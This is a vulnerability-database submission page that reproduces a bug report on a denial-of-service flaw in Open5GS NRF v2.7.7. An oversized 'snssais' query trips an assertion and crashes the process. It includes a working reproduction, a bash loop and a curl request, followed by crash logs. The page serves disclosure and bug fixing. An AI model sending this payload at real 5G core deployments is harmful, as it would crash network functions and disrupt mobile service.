提交 #808513: Open5gs NRF v2.7.7 Denial of Service信息

标题	Open5gs NRF v2.7.7 Denial of Service
描述	### Open5GS Release, Revision, or Tag v2.7.7 ### Steps to reproduce ### Description NRF crashes when the `snssais` discovery query parameter contains more entries than `OGS_MAX_NUM_OF_SLICE`. The discovery query parser eventually calls: ```c ogs_assert(discovery_option->num_of_snssais < OGS_MAX_NUM_OF_SLICE); ``` which makes an oversized `snssais` query abort the process. ### Steps to reproduce ```bash snssais='[' for i in $(seq 1 20); do snssais="$snssais{\"sst\":1,\"sd\":\"000001\"}," done snssais=${snssais%,} snssais="$snssais]" curl --http2-prior-knowledge -m 5 -sS -i --get \ 'http://10.33.33.3/nnrf-disc/v1/nf-instances' \ --data-urlencode 'target-nf-type=SMF' \ --data-urlencode 'requester-nf-type=AMF' \ --data-urlencode "snssais=$snssais" ``` Then check: ```bash docker inspect -f '{{.State.Status}} {{.State.ExitCode}} {{.State.FinishedAt}}' nrf docker logs --since 2026-04-10T17:24:20Z nrf \| tail -40 ``` ### Logs ```shell curl: (56) Recv failure: Connection reset by peer exited 139 2026-04-10T17:24:21.881998907Z 04/10 17:24:21.791: [sbi] FATAL: ogs_sbi_discovery_option_add_snssais: Assertion `discovery_option->num_of_snssais < OGS_MAX_NUM_OF_SLICE' failed. (../lib/sbi/message.c:3723) ``` ### Expected behaviour NRF should reject oversized `snssais` input with a normal HTTP error response. ### Observed Behaviour The connection is reset and the NRF process exits with code `139`. ### eNodeB/gNodeB Not required. ### UE Models and versions Not required.
来源	⚠️ https://github.com/open5gs/open5gs/issues/4461
用户	LinJu (UID 97503)
提交	2026-04-20 21時52分 (1 月前)
管理	2026-05-16 12時09分 (26 days later)
状态	重复
VulDB条目	364318 [Open5GS 直到 2.7.7 NRF /lib/sbi/message.c service-names/snssais 拒绝服务]
积分	0

◂ 上一步一览下一步 ▸

Do you know our Splunk app?

Download it now for free!